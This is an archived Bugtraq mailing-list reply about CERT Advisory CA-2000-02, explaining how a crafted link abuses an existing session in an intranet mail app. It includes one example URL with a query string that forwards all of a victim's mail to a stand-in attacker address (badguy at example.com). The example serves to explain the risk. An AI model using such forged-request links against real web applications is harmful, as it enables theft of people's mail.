Home page logo
/

bugtraq logo Bugtraq mailing list archives

Re: Fwd: CERT Advisory CA-2000-02
From: sekurity () HOTMAIL COM (Cassius)
Date: Thu, 3 Feb 2000 22:11:36 GMT


Shockro,

The danger is also in variables.  Pretend that I get you to click on this
link from within your custom intranet mail app.

badguy () example com">http://intranet.example.com/mailbox.asp?action=forward&item=all&recipient=badguy () example 
com</A>

It would forward all of your mail to badguy () example com   This would  work
because you already have a session with mailbox.asp.

Of course mailbox.asp is fake but you get the idea.

-Cassius
______________________________________________________
Get Your Private, Free Email at http://www.hotmail.com


  By Date           By Thread  

Current thread:
  • Re: Fwd: CERT Advisory CA-2000-02 Cassius (Feb 03)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault